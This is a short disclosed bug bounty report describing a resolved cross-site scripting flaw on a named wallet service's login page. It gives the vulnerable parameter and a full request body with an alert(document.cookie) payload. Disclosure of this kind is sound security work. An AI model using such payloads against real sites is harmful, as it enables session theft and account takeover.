Cross site scripting

Disclosed: 2015-07-12 18:45:43 By jaikeysarraf To enter
Unknown
Vulnerability Details
page : https://wallet.romit.io/login post data "[email protected]" set to "email[]=<a onmouseover=alert(document.cookie)>xxs link</a>" full request data email[]=<a onmouseover=alert(document.cookie)>xxs link</a>&password=g00dPa%24%24w0rD&_csrf=5afeda5f-e604-4ba0-bd60-d83f975853c5
Actions
View on HackerOne
Report Stats
  • Report ID: 63888
  • State: Closed
  • Substate: resolved
  • Upvotes: 1
Share this report